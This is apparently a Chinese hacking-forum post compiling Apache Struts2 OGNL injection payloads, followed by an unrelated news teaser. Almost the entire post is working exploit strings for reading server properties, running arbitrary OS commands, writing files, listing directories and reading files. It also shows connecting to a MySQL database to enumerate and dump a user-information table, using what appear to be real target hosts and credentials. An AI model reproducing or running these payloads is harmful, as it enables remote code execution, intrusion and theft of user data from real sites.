2010版的,其他的版本,在这个基础上修个。欢迎多爆料。
网站物理路径:
('43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('43context['xwork.MethodAccessor.denyMethodExecution']75false')(b))&('43c')(('[email protected]@EMPTY_SET')(c))&(g)(('[email protected]@getRequest()')(d))&(i2)(('[email protected]@getResponse()')(d))&(i2)(('[email protected]@getResponse()')(d))&(i95)(('43xman.getWriter().println(43req.getRealPath(%22u005c%22))')(d))&(i99)(('43xman.getWriter().close()')(d))
('43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('43context['xwork.MethodAccessor.denyMethodExecution']75false')(b))&('43c')(('[email protected]@EMPTY_SET')(c))&(g)(('[email protected]@getRequest()')(d))&(i2)(('[email protected]@getResponse()')(d))&(i2)(('[email protected]@getResponse()')(d))&(i95)(('43xman.getWriter().println(43req.getRealPath(%22u005c%22))')(d))&(i99)(('43xman.getWriter().close()')(d))
java.版本:
('43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('43context['xwork.MethodAccessor.denyMethodExecution']75false')(b))&('43c')(('[email protected]@EMPTY_SET')(c))&(g)(('[email protected]@getRequest()')(d))&(i2)(('[email protected]@getResponse()')(d))&(i2)(('[email protected]@getResponse()')(d))&(i95)(('43xman.getWriter().println(@java.lang.System@getProperty(%22java.version%22))')(d))&(i99)(('43xman.getWriter().close()')(d))
os.name:
('43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('43context['xwork.MethodAccessor.denyMethodExecution']75false')(b))&('43c')(('[email protected]@EMPTY_SET')(c))&(g)(('[email protected]@getRequest()')(d))&(i2)(('[email protected]@getResponse()')(d))&(i2)(('[email protected]@getResponse()')(d))&(i95)(('43xman.getWriter().println(@java.lang.System@getProperty(%22os.name%22))')(d))&(i99)(('43xman.getWriter().close()')(d))
os.arch
('43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('43context['xwork.MethodAccessor.denyMethodExecution']75false')(b))&('43c')(('[email protected]@EMPTY_SET')(c))&(g)(('[email protected]@getRequest()')(d))&(i2)(('[email protected]@getResponse()')(d))&(i2)(('[email protected]@getResponse()')(d))&(i95)(('43xman.getWriter().println(@java.lang.System@getProperty(%22os.arch%22))')(d))&(i99)(('43xman.getWriter().close()')(d))
os.version
('43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('43context['xwork.MethodAccessor.denyMethodExecution']75false')(b))&('43c')(('[email protected]@EMPTY_SET')(c))&(g)(('[email protected]@getRequest()')(d))&(i2)(('[email protected]@getResponse()')(d))&(i2)(('[email protected]@getResponse()')(d))&(i95)(('43xman.getWriter().println(@java.lang.System@getProperty(%22os.version%22))')(d))&(i99)(('43xman.getWriter().close()')(d))
user.name
('43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('43context['xwork.MethodAccessor.denyMethodExecution']75false')(b))&('43c')(('[email protected]@EMPTY_SET')(c))&(g)(('[email protected]@getRequest()')(d))&(i2)(('[email protected]@getResponse()')(d))&(i2)(('[email protected]@getResponse()')(d))&(i95)(('43xman.getWriter().println(@java.lang.System@getProperty(%22user.name%22))')(d))&(i99)(('43xman.getWriter().close()')(d))
user.home
网站物理路径:
java.home: 43req.getRealPath(%22u005c%22)
java.version: @java.lang.System@getProperty(%22java.version%22)
os.name: @java.lang.System@getProperty(%22os.name%22)
os.arch: @java.lang.System@getProperty(%22os.arch%22)
os.version: @java.lang.System@getProperty(%22os.version%22)
user.name: @java.lang.System@getProperty(%22user.name%22)
user.home: /usr/share/jbossas
user.dir: /var/lib/jbossas/bin
java.class.version: 49.0
java.class.path: /var/lib/jbossas/bin/run.jar:/usr/lib/jvm/java/lib/tools.jar
java.library.path: /usr/lib/jvm/java-1.5.0-sun-1.5.0.13.x86_64/jre/lib/amd64/server:/usr/lib/jvm/java-1.5.0-sun-1.5.0.13.x86_64/jre/lib/amd64:/usr/lib/jvm/java-1.5.0-sun-1.5.0.13.x86_64/jre/../lib/amd64
file.separator: /
path.separator: :
java.vendor: Sun Microsystems Inc.
java.vendor.url: http://java.sun.com/
java.vm.specification.version: 1.0
java.vm.specification.vendor: Sun Microsystems Inc.
java.vm.specification.name: Java Virtual Machine Specification
java.vm.version: 1.5.0_13-b05
java.vm.vendor: Sun Microsystems Inc.
java.vm.name: Java HotSpot(TM) 64-Bit Server VM
java.specification.version: 1.5
java.specification.vender:
java.specification.name: Java Platform API Specification
java.io.tmpdir: /tmp
执行CMD
('43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('43context['xwork.MethodAccessor.denyMethodExecution']75false')(b))&('43c')(('[email protected]@EMPTY_SET')(c))&(g)(('[email protected]@getRequest()')(d))&(h)(('[email protected]@getRuntime().exec(43req.getParameter(%22cmd%22))')(d))&(i)(('43webRootzproreader75new40java.io.DataInputStream(43webRootzpro.getInputStream())')(d))&(i01)(('43webStr75new40byte[51020]')(d))&(i1)(('43webRootzproreader.readFully(43webStr)')(d))&(i111)(('43webStr1275new40java.lang.String(43webStr)')(d))&(i2)(('[email protected]@getResponse()')(d))&(i2)(('[email protected]@getResponse()')(d))&(i95)(('43xman.getWriter().println(43webStr12)')(d))&(i99)(('43xman.getWriter().close()')(d))&cmd=ls
('43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('43context['xwork.MethodAccessor.denyMethodExecution']75false')(b))&('43c')(('[email protected]@EMPTY_SET')(c))&(g)(('[email protected]@getRequest()')(d))&(h)(('[email protected]@getRuntime().exec(43req.getParameter(%22cmd%22))')(d))&(i)(('43webRootzproreader75new40java.io.DataInputStream(43webRootzpro.getInputStream())')(d))&(i01)(('43webStr75new40byte[51020]')(d))&(i1)(('43webRootzproreader.readFully(43webStr)')(d))&(i111)(('43webStr1275new40java.lang.String(43webStr)')(d))&(i2)(('[email protected]@getResponse()')(d))&(i2)(('[email protected]@getResponse()')(d))&(i95)(('43xman.getWriter().println(43webStr12)')(d))&(i99)(('43xman.getWriter().close()')(d))&cmd=ls+-la
http://www.quam.net/index.action?request_locale=zh_TW&
('43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('43context['xwork.MethodAccessor.denyMethodExecution']75false')(b))&('43c')(('[email protected]@EMPTY_SET')(c))&(g)(('[email protected]@getRequest()')(d))&(h)(('[email protected]@getRuntime().exec(43req.getParameter(%22cmd%22))')(d))&(i)(('43webRootzproreader75new40java.io.DataInputStream(43webRootzpro.getInputStream())')(d))&(i01)(('43webStr75new40byte[51020]')(d))&(i1)(('43webRootzproreader.readFully(43webStr)')(d))&(i111)(('43webStr1275new40java.lang.String(43webStr)')(d))&(i2)(('[email protected]@getResponse()')(d))&(i2)(('[email protected]@getResponse()')(d))&(i95)(('43xman.getWriter().println(43webStr12)')(d))&(i99)(('43xman.getWriter().close()')(d))&cmd=cat+%2Ftmp%2Fhsmw.txt
上传文件数据包
('u0023_memberAccess['allowStaticMethodAccess']')(meh)=true&(aaa)(('u0023context['xwork.MethodAccessor.denyMethodExecution']u003du0023foo')(u0023foou003dnew%20java.lang.Boolean(%22false%22)))&(i1)(('[email protected]@getRequest()')(d))&(i2)(('43fos75new40java.io.FileOutputStream(43req.getParameter(%22path%22))')(d))&(i3)(('43fos.write(43req.getParameter(%22t%22).getBytes())')(d))&(i4)(('43fos.close()')(d))
POST
t=neirong&path=%2Ftmp%2Fhsmw.txt
修改POST版加&即可。
('u0023_memberAccess['allowStaticMethodAccess']')(meh)=true&(aaa)(('u0023context['xwork.MethodAccessor.denyMethodExecution']u003du0023foo')(u0023foou003dnew%20java.lang.Boolean(%22false%22)))&(i1)(('[email protected]@getRequest()')(d))&(i2)(('43fos75new40java.io.FileOutputStream(43req.getParameter(%22path%22))')(d))&(i3)(('43fos.write(43req.getParameter(%22t%22).getBytes())')(d))&(i4)(('43fos.close()')(d))
&t=neirong&path=%2Ftmp%2Fhsmw.txt
('u0023_memberAccess['allowStaticMethodAccess']')(meh)=true&(aaa)(('u0023context['xwork.MethodAccessor.denyMethodExecution']u003du0023foo')(u0023foou003dnew%20java.lang.Boolean(%22false%22)))&(i1)(('[email protected]@getRequest()')(d))&(i2)(('43fos75new40java.io.FileOutputStream(43req.getParameter(%22path%22))')(d))&(i3)(('43fos.write(43req.getParameter(%22t%22).getBytes())')(d))&(i4)(('43fos.close()')(d))
&t=neirong&path=/tmp/hsmw.txt
列目录
返回值(true)判断读取 @java.io.File@listRoots()[0].isDirectory()
('43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('43context['xwork.MethodAccessor.denyMethodExecution']75false')(b))&('43c')(('[email protected]@EMPTY_SET')(c))&(g)(('[email protected]@getRequest()')(d))&(i2)(('[email protected]@getResponse()')(d))&(i95)(('43xman.getWriter().println(@java.io.File@listRoots()[0].isDirectory())')(d))&(i99)(('43xman.getWriter().close()')(d))
目录数 @java.io.File@listRoots().length
('43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('43context['xwork.MethodAccessor.denyMethodExecution']75false')(b))&('43c')(('[email protected]@EMPTY_SET')(c))&(g)(('[email protected]@getRequest()')(d))&(i2)(('[email protected]@getResponse()')(d))&(i95)(('43xman.getWriter().println(@java.io.File@listRoots().length)')(d))&(i99)(('43xman.getWriter().close()')(d))
第一个数组 @java.io.File@listRoots()[0])
('43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('43context['xwork.MethodAccessor.denyMethodExecution']75false')(b))&('43c')(('[email protected]@EMPTY_SET')(c))&(g)(('[email protected]@getRequest()')(d))&(i2)(('[email protected]@getResponse()')(d))&(i95)(('43xman.getWriter().println(@java.io.File@listRoots()[0])')(d))&(i99)(('43xman.getWriter().close()')(d))
数组返回值 @java.io.File@listRoots()[0].listFiles().length
('43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('43context['xwork.MethodAccessor.denyMethodExecution']75false')(b))&('43c')(('[email protected]@EMPTY_SET')(c))&(g)(('[email protected]@getRequest()')(d))&(i2)(('[email protected]@getResponse()')(d))&(i95)(('43xman.getWriter().println(@java.io.File@listRoots()[0].listFiles().length)')(d))&(i99)(('43xman.getWriter().close()')(d))
第一个 @java.io.File@listRoots()[0].listFiles()[0].getName()
('43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('43context['xwork.MethodAccessor.denyMethodExecution']75false')(b))&('43c')(('[email protected]@EMPTY_SET')(c))&(g)(('[email protected]@getRequest()')(d))&(i2)(('[email protected]@getResponse()')(d))&(i95)(('43xman.getWriter().println(@java.io.File@listRoots()[0].listFiles()[0].getName())')(d))&(i99)(('43xman.getWriter().close()')(d))
第2个 @java.io.File@listRoots()[0].listFiles()[1].getName()
('43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('43context['xwork.MethodAccessor.denyMethodExecution']75false')(b))&('43c')(('[email protected]@EMPTY_SET')(c))&(g)(('[email protected]@getRequest()')(d))&(i2)(('[email protected]@getResponse()')(d))&(i95)(('43xman.getWriter().println(@java.io.File@listRoots()[0].listFiles()[1].getName())')(d))&(i99)(('43xman.getWriter().close()')(d))
如何判断文件 返回值(false) @java.io.File@listRoots()[0].listFiles()[19].listFiles()[22].isDirectory()
('43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('43context['xwork.MethodAccessor.denyMethodExecution']75false')(b))&('43c')(('[email protected]@EMPTY_SET')(c))&(g)(('[email protected]@getRequest()')(d))&(i2)(('[email protected]@getResponse()')(d))&(i95)(('43xman.getWriter().println(@java.io.File@listRoots()[0].listFiles()[19].listFiles()[22].isDirectory())')(d))&(i99)(('43xman.getWriter().close()')(d))
判断文件大小 @java.io.File@listRoots()[0].listFiles()[19].listFiles()[22].length()
('43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('43context['xwork.MethodAccessor.denyMethodExecution']75false')(b))&('43c')(('[email protected]@EMPTY_SET')(c))&(g)(('[email protected]@getRequest()')(d))&(i2)(('[email protected]@getResponse()')(d))&(i95)(('43xman.getWriter().println(@java.io.File@listRoots()[0].listFiles()[19].listFiles()[22].length())')(d))&(i99)(('43xman.getWriter().close()')(d))
输出文件内容
@java.io.File@listRoots()[0].listFiles()[19].listFiles()[22])
('43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('43context['xwork.MethodAccessor.denyMethodExecution']75false')(b))&('43c')(('[email protected]@EMPTY_SET')(c))&(g)(('[email protected]@getRequest()')(d))&(i1)(('43dis75new40java.io.DataInputStream(new40java.io.FileInputStream(@java.io.File@listRoots()[0].listFiles()[19].listFiles()[22]))')(d))&(i2)(('43dos75new40java.io.DataOutputStream(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())')(d))&(i3)(('43buff75new40byte[102400]')(d))&(i4)(('43dis.skipBytes(0)')(d))&(i5)(('43size7543dis.read(43buff)')(d))&(i6)(('43dis.close()')(d))&(i7)(('43dos.writeInt(43size)')(d))&(i95)(('43dos.write(43buffu002c0u002c43size)')(d))&(i99)(('43dos.close()')(d))
@java.io.File@listRoots()[0].listFiles()[19].listFiles()[7])
('43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('43context['xwork.MethodAccessor.denyMethodExecution']75false')(b))&('43c')(('[email protected]@EMPTY_SET')(c))&(g)(('[email protected]@getRequest()')(d))&(i1)(('43dis75new40java.io.DataInputStream(new40java.io.FileInputStream(@java.io.File@listRoots()[0].listFiles()[19].listFiles()[7]))')(d))&(i2)(('43dos75new40java.io.DataOutputStream(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())')(d))&(i3)(('43buff75new40byte[102400]')(d))&(i4)(('43dis.skipBytes(0)')(d))&(i5)(('43size7543dis.read(43buff)')(d))&(i6)(('43dis.close()')(d))&(i7)(('43dos.writeInt(43size)')(d))&(i95)(('43dos.write(43buffu002c0u002c43size)')(d))&(i99)(('43dos.close()')(d))
—数据库操作—
rs.absolute(1) 为第1个数据库
('43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('43context['xwork.MethodAccessor.denyMethodExecution']75false')(b))&('43c')(('[email protected]@EMPTY_SET')(c))&(i1)(('[email protected]@getRequest()')(d))&(i2)(('[email protected]@getResponse()')(d))&(i3)(('@java.lang.Class@forName(43req.getParameter(%22clazz%22))')(d))&(i4)(('[email protected]@getConnection(43req.getParameter(%22url%22)u002c43req.getParameter(%22user%22)u002c43req.getParameter(%22psw%22))')(d))&(i5)(('43rs7543con.getMetaData().getCatalogs()')(d))&(i6)(('43rs.absolute(1)')(d))&&(i95)(('43xman.getWriter().println(43rs.getString(1))')(d))&(i99)(('43xman.getWriter().close()')(d))&psw=123456&user=yaolanabc&clazz=com.mysql.jdbc.Driver&url=jdbc%3Amysql%3A%2F%2Fdb.abc.yaolan.com%2Fabc%3FuseUnicode%3Dtrue%26amp%3BcharacterEncoding%3DUTF-8
rs.absolute(2) 为第2个数据库
('43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('43context['xwork.MethodAccessor.denyMethodExecution']75false')(b))&('43c')(('[email protected]@EMPTY_SET')(c))&(i1)(('[email protected]@getRequest()')(d))&(i2)(('[email protected]@getResponse()')(d))&(i3)(('@java.lang.Class@forName(43req.getParameter(%22clazz%22))')(d))&(i4)(('[email protected]@getConnection(43req.getParameter(%22url%22)u002c43req.getParameter(%22user%22)u002c43req.getParameter(%22psw%22))')(d))&(i5)(('43rs7543con.getMetaData().getCatalogs()')(d))&(i6)(('43rs.absolute(2)')(d))&&(i95)(('43xman.getWriter().println(43rs.getString(1))')(d))&(i99)(('43xman.getWriter().close()')(d))&psw=123456&user=yaolanabc&clazz=com.mysql.jdbc.Driver&url=jdbc%3Amysql%3A%2F%2Fdb.abc.yaolan.com%2Fabc%3FuseUnicode%3Dtrue%26amp%3BcharacterEncoding%3DUTF-8
以此类推,访问数值为空,停止。数据库连接格式比较
&psw=123456&user=yaolanabc&clazz=com.mysql.jdbc.Driver&url=jdbc%3Amysql%3A%2F%2Fdb.abc.yaolan.com%2Fabc%3FuseUnicode%3Dtrue%26amp%3BcharacterEncoding%3DUTF-8
&psw=密码&user=账号&clazz=数据库类型&url=数据库URL(注意URL编码)
------
数据库(表查询)在原来的语句中,多出一个 &db=数据库名
rs.absolute(1) 为第1个表
('43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('43context['xwork.MethodAccessor.denyMethodExecution']75false')(b))&('43c')(('[email protected]@EMPTY_SET')(c))&(i1)(('[email protected]@getRequest()')(d))&(i2)(('[email protected]@getResponse()')(d))&(i3)(('@java.lang.Class@forName(43req.getParameter(%22clazz%22))')(d))&(i4)(('[email protected]@getConnection(43req.getParameter(%22url%22)u002c43req.getParameter(%22user%22)u002c43req.getParameter(%22psw%22))')(d))&(i5)(('43rs7543con.getMetaData().getTables(43req.getParameter(%22db%22)u002c%22%25%22u002c%22%25%22u002cnew40java.lang.String[]{%22TABLE%22})')(d))&(i6)(('43rs.absolute(1)')(d))&&(i95)(('43xman.getWriter().println(43rs.getString(%22TABLE_NAME%22))')(d))&(i99)(('43xman.getWriter().close()')(d))&db=shanxi&psw=123456&user=yaolanabc&clazz=com.mysql.jdbc.Driver&url=jdbc%3Amysql%3A%2F%2Fdb.abc.yaolan.com%2Fabc%3FuseUnicode%3Dtrue%26amp%3BcharacterEncoding%3DUTF-8
rs.absolute(2) 为第2个表
('43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('43context['xwork.MethodAccessor.denyMethodExecution']75false')(b))&('43c')(('[email protected]@EMPTY_SET')(c))&(i1)(('[email protected]@getRequest()')(d))&(i2)(('[email protected]@getResponse()')(d))&(i3)(('@java.lang.Class@forName(43req.getParameter(%22clazz%22))')(d))&(i4)(('[email protected]@getConnection(43req.getParameter(%22url%22)u002c43req.getParameter(%22user%22)u002c43req.getParameter(%22psw%22))')(d))&(i5)(('43rs7543con.getMetaData().getTables(43req.getParameter(%22db%22)u002c%22%25%22u002c%22%25%22u002cnew40java.lang.String[]{%22TABLE%22})')(d))&(i6)(('43rs.absolute(2)')(d))&&(i95)(('43xman.getWriter().println(43rs.getString(%22TABLE_NAME%22))')(d))&(i99)(('43xman.getWriter().close()')(d))&db=shanxi&psw=123456&user=yaolanabc&clazz=com.mysql.jdbc.Driver&url=jdbc%3Amysql%3A%2F%2Fdb.abc.yaolan.com%2Fabc%3FuseUnicode%3Dtrue%26amp%3BcharacterEncoding%3DUTF-8
------
数据库(字段查询)在原来的语句中,多出一个 &table=表
rs.absolute(1)为第1个字段
('43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('43context['xwork.MethodAccessor.denyMethodExecution']75false')(b))&('43c')(('[email protected]@EMPTY_SET')(c))&(i1)(('[email protected]@getRequest()')(d))&(i2)(('[email protected]@getResponse()')(d))&(i3)(('@java.lang.Class@forName(43req.getParameter(%22clazz%22))')(d))&(i4)(('[email protected]@getConnection(43req.getParameter(%22url%22)u002c43req.getParameter(%22user%22)u002c43req.getParameter(%22psw%22))')(d))&(i5)(('43rs7543con.getMetaData().getColumns(43req.getParameter(%22db%22)u002c%22%25%22u002c43req.getParameter(%22table%22)u002c%22%25%22)')(d))&(i6)(('43rs.absolute(1)')(d))&(i95)(('43xman.getWriter().println(43rs.getString(%22COLUMN_NAME%22))')(d))&(i99)(('43xman.getWriter().close()')(d))&db=shanxi&psw=123456&table=userinfos&user=yaolanabc&clazz=com.mysql.jdbc.Driver&url=jdbc%3Amysql%3A%2F%2Fdb.abc.yaolan.com%2Fabc%3FuseUnicode%3Dtrue%26amp%3BcharacterEncoding%3DUTF-8
rs.absolute(2)为第2个字段
('43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('43context['xwork.MethodAccessor.denyMethodExecution']75false')(b))&('43c')(('[email protected]@EMPTY_SET')(c))&(i1)(('[email protected]@getRequest()')(d))&(i2)(('[email protected]@getResponse()')(d))&(i3)(('@java.lang.Class@forName(43req.getParameter(%22clazz%22))')(d))&(i4)(('[email protected]@getConnection(43req.getParameter(%22url%22)u002c43req.getParameter(%22user%22)u002c43req.getParameter(%22psw%22))')(d))&(i5)(('43rs7543con.getMetaData().getColumns(43req.getParameter(%22db%22)u002c%22%25%22u002c43req.getParameter(%22table%22)u002c%22%25%22)')(d))&(i6)(('43rs.absolute(2)')(d))&(i95)(('43xman.getWriter().println(43rs.getString(%22COLUMN_NAME%22))')(d))&(i99)(('43xman.getWriter().close()')(d))&db=shanxi&psw=123456&table=userinfos&user=yaolanabc&clazz=com.mysql.jdbc.Driver&url=jdbc%3Amysql%3A%2F%2Fdb.abc.yaolan.com%2Fabc%3FuseUnicode%3Dtrue%26amp%3BcharacterEncoding%3DUTF-8
-----
数据库(执行SQL语句)在原来的语句中,多出一个 &sql=select+count%28*%29+from+userinfos
!这里GET 的数据!POST 木有,怪了。
计算查询的字段数 (例子1)
('43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('43context['xwork.MethodAccessor.denyMethodExecution']75false')(b))&('43c')(('[email protected]@EMPTY_SET')(c))&(i1)(('[email protected]@getRequest()')(d))&(i2)(('[email protected]@getResponse()')(d))&(i3)(('@java.lang.Class@forName(43req.getParameter(%22clazz%22))')(d))&(i4)(('[email protected]@getConnection(43req.getParameter(%22url%22)u002c43req.getParameter(%22user%22)u002c43req.getParameter(%22psw%22))')(d))&(i45)(('43con.setCatalog(43req.getParameter(%22db%22))')(d))&(i5)(('43rs7543con.createStatement().executeQuery(43req.getParameter(%22sql%22))')(d))&(i95)(('43xman.getWriter().println(43rs.getMetaData().getColumnCount())')(d))&(i99)(('43xman.getWriter().close()')(d))&db=shanxi&sql=select+count%28*%29+from+userinfos&psw=123456&user=yaolanabc&clazz=com.mysql.jdbc.Driver&url=jdbc%3Amysql%3A%2F%2Fdb.abc.yaolan.com%2Fabc%3FuseUnicode%3Dtrue%26amp%3BcharacterEncoding%3DUTF-8
计算查询的字段数 (例子2)返回值8,就是8个字段
('43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('43context['xwork.MethodAccessor.denyMethodExecution']75false')(b))&('43c')(('[email protected]@EMPTY_SET')(c))&(i1)(('[email protected]@getRequest()')(d))&(i2)(('[email protected]@getResponse()')(d))&(i3)(('@java.lang.Class@forName(43req.getParameter(%22clazz%22))')(d))&(i4)(('[email protected]@getConnection(43req.getParameter(%22url%22)u002c43req.getParameter(%22user%22)u002c43req.getParameter(%22psw%22))')(d))&(i45)(('43con.setCatalog(43req.getParameter(%22db%22))')(d))&(i5)(('43rs7543con.createStatement().executeQuery(43req.getParameter(%22sql%22))')(d))&(i95)(('43xman.getWriter().println(43rs.getMetaData().getColumnCount())')(d))&(i99)(('43xman.getWriter().close()')(d))&db=shanxi&sql=select+*+from+userinfos&psw=123456&user=yaolanabc&clazz=com.mysql.jdbc.Driver&url=jdbc%3Amysql%3A%2F%2Fdb.abc.yaolan.com%2Fabc%3FuseUnicode%3Dtrue%26amp%3BcharacterEncoding%3DUTF-8
确定8以后,rs.getMetaData().getColumnName(1) 然后 rs.getMetaData().getColumnName(2) 类推8个字段。
('43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('43context['xwork.MethodAccessor.denyMethodExecution']75false')(b))&('43c')(('[email protected]@EMPTY_SET')(c))&(i1)(('[email protected]@getRequest()')(d))&(i2)(('[email protected]@getResponse()')(d))&(i3)(('@java.lang.Class@forName(43req.getParameter(%22clazz%22))')(d))&(i4)(('[email protected]@getConnection(43req.getParameter(%22url%22)u002c43req.getParameter(%22user%22)u002c43req.getParameter(%22psw%22))')(d))&(i45)(('43con.setCatalog(43req.getParameter(%22db%22))')(d))&(i5)(('43rs7543con.createStatement().executeQuery(43req.getParameter(%22sql%22))')(d))&(i95)(('43xman.getWriter().println(new40java.lang.StringBuilder().append(43rs.getMetaData().getColumnName(1)).append(%22%25%25%25%22).append(43rs.getMetaData().getColumnName(2)).append(%22%25%25%25%22).append(43rs.getMetaData().getColumnName(3)).append(%22%25%25%25%22).append(43rs.getMetaData().getColumnName(4)).append(%22%25%25%25%22).append(43rs.getMetaData().getColumnName(5)).append(%22%25%25%25%22).append(43rs.getMetaData().getColumnName(6)).append(%22%25%25%25%22).append(43rs.getMetaData().getColumnName(7)).append(%22%25%25%25%22).append(43rs.getMetaData().getColumnName(8)).append(%22%25%25%25%22))')(d))&(i99)(('43xman.getWriter().close()')(d))&db=shanxi&sql=select+*+from+userinfos&psw=123456&user=yaolanabc&clazz=com.mysql.jdbc.Driver&url=jdbc%3Amysql%3A%2F%2Fdb.abc.yaolan.com%2Fabc%3FuseUnicode%3Dtrue%26amp%3BcharacterEncoding%3DUTF-8
输出内容 用rs.next(),第一条内容,是rs.next()
('43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('43context['xwork.MethodAccessor.denyMethodExecution']75false')(b))&('43c')(('[email protected]@EMPTY_SET')(c))&(i1)(('[email protected]@getRequest()')(d))&(i2)(('[email protected]@getResponse()')(d))&(i3)(('@java.lang.Class@forName(43req.getParameter(%22clazz%22))')(d))&(i4)(('[email protected]@getConnection(43req.getParameter(%22url%22)u002c43req.getParameter(%22user%22)u002c43req.getParameter(%22psw%22))')(d))&(i45)(('43con.setCatalog(43req.getParameter(%22db%22))')(d))&(i5)(('43rs7543con.createStatement().executeQuery(43req.getParameter(%22sql%22))')(d))&(i6)(('43rs.next()')(d))&(i95)(('43xman.getWriter().println(new40java.lang.StringBuilder().append(43rs.getString(1)%2b%22%22).append(%22%25%25%25%22).append(43rs.getString(2)%2b%22%22).append(%22%25%25%25%22).append(43rs.getString(3)%2b%22%22).append(%22%25%25%25%22).append(43rs.getString(4)%2b%22%22).append(%22%25%25%25%22).append(43rs.getString(5)%2b%22%22).append(%22%25%25%25%22).append(43rs.getString(6)%2b%22%22).append(%22%25%25%25%22).append(43rs.getString(7)%2b%22%22).append(%22%25%25%25%22).append(43rs.getString(8)%2b%22%22).append(%22%25%25%25%22))')(d))&(i99)(('43xman.getWriter().close()')(d))&db=shanxi&sql=select+*+from+userinfos&psw=123456&user=yaolanabc&clazz=com.mysql.jdbc.Driver&url=jdbc%3Amysql%3A%2F%2Fdb.abc.yaolan.com%2Fabc%3FuseUnicode%3Dtrue%26amp%3BcharacterEncoding%3DUTF-8
第2条,是43rs.next()%2b43rs.next() 2个
('43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('43context['xwork.MethodAccessor.denyMethodExecution']75false')(b))&('43c')(('[email protected]@EMPTY_SET')(c))&(i1)(('[email protected]@getRequest()')(d))&(i2)(('[email protected]@getResponse()')(d))&(i3)(('@java.lang.Class@forName(43req.getParameter(%22clazz%22))')(d))&(i4)(('[email protected]@getConnection(43req.getParameter(%22url%22)u002c43req.getParameter(%22user%22)u002c43req.getParameter(%22psw%22))')(d))&(i45)(('43con.setCatalog(43req.getParameter(%22db%22))')(d))&(i5)(('43rs7543con.createStatement().executeQuery(43req.getParameter(%22sql%22))')(d))&(i6)(('43rs.next()%2b43rs.next()')(d))&(i95)(('43xman.getWriter().println(new40java.lang.StringBuilder().append(43rs.getString(1)%2b%22%22).append(%22%25%25%25%22).append(43rs.getString(2)%2b%22%22).append(%22%25%25%25%22).append(43rs.getString(3)%2b%22%22).append(%22%25%25%25%22).append(43rs.getString(4)%2b%22%22).append(%22%25%25%25%22).append(43rs.getString(5)%2b%22%22).append(%22%25%25%25%22).append(43rs.getString(6)%2b%22%22).append(%22%25%25%25%22).append(43rs.getString(7)%2b%22%22).append(%22%25%25%25%22).append(43rs.getString(8)%2b%22%22).append(%22%25%25%25%22))')(d))&(i99)(('43xman.getWriter().close()')(d))&db=shanxi&sql=select+*+from+userinfos&psw=123456&user=yaolanabc&clazz=com.mysql.jdbc.Driver&url=jdbc%3Amysql%3A%2F%2Fdb.abc.yaolan.com%2Fabc%3FuseUnicode%3Dtrue%26amp%3BcharacterEncoding%3DUTF-8
第3个是 3个。
第4个是 4个。43rs.next()%2b43rs.next()%2b43rs.next()%2b43rs.next()
貌似最多只能200多个。
文章来源于lcx.cc:stuts2 EXP POST 数据
相关推荐: 市民1天遭10086发4万条相同短信 移动称无法取消
央广网郑州9月13日消息 据中国之声《新闻晚高峰》报道,最近郑州市民马女士遇到一件蹊跷事,她的手机一天能收到一万多条10086发来的短信。这期间马女士向移动客服反映了24次,客服表示已将短信发送停掉,但仍有短信以每秒1条的速度涌进手机。 从9月11号开始,郑州…
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论